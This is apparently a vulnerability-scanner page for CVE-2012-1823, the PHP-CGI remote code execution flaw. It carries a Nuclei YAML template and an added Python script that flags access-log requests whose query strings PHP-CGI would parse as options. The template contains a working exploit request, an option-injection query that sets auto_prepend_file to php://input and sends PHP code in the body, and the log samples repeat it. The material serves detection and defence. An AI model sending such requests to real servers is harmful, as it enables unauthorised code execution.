PHP CGI v5.3.12/5.4.2 Remote Code Execution
ID: CVE-2012-1823
Severity: high
Author: pikpikcu
Tags: cve,cve2012,kev,vulhub,rce,php
Description
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the ‘d’ case.
YAML Source
id: CVE-2012-1823

info:
  name: PHP CGI v5.3.12/5.4.2 Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
  impact: |
    Remote code execution
  remediation: |
    Upgrade to a patched version of PHP or apply the necessary security patches.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
    - https://nvd.nist.gov/vuln/detail/CVE-2012-1823
    - https://bugs.php.net/bug.php?id=61910
    - http://www.php.net/ChangeLog-5.php#5.4.2
    - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2012-1823
    cwe-id: CWE-20
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: php
    product: php
    shodan-query: cpe:"cpe:2.3:a:php:php"
  tags: cve,cve2012,kev,vulhub,rce,php

variables:
  string: "CVE-2012-1823"

http:
  - raw:
      - |
        POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        <?php echo md5("{{string}}");?>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(string)}}'
# digest: 490a0046304402201cb92360b648a9f4f4fd10ea348655c877d640a714bb2277f49b2af83c0095cf0220285b5f8a6cef71248bfaab4597b5b4707363b7ca6b3963d3a7f85a934cde09f2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-1823.yaml"
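
The same condition can be checked from the server side by reviewing access logs. The script below is an added example, not part of the template or the Nuclei project: it applies the CGI rule described above (a query string with no unencoded "=" is split on "+" and handed to the script as command-line arguments, RFC 3875 section 4.4) and reports requests whose derived arguments begin with "-". The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def cgi_argv_from_query(query):
    """Arguments a CGI server derives from `query` (RFC 3875 section 4.4).

    Returns [] when the query is empty or holds an unencoded '=', because
    such a query is never turned into a command line.
    """
    if not query or "=" in query:
        return []
    # Split on '+' first, then percent-decode each piece, so encoded
    # characters are compared in their decoded form.
    return [unquote(part) for part in query.split("+") if part]

def suspicious_switches(target):
    """Decoded argv if any argument would be read as an option, else []."""
    _, sep, query = target.partition("?")
    if not sep:
        return []
    argv = cgi_argv_from_query(query)
    return argv if any(arg.startswith("-") for arg in argv) else []

def scan(lines):
    """Return (line number, method, argv) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            argv = suspicious_switches(match.group("target"))
            if argv:
                hits.append((number, match.group("method"), argv))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
# The second line carries the request used by the template above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=2&sort=-date HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "POST /index.php?-d+allow_url_include%3don'
    '+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 33',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?php+cgi HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, method, argv in scan(SAMPLE_LOG):
        print(f"line {number}: {method} query parsed as argv {argv}")
```

A hit shows only that a request would have been parsed as options; whether the host was affected still depends on the PHP version and on php-cgi being in use.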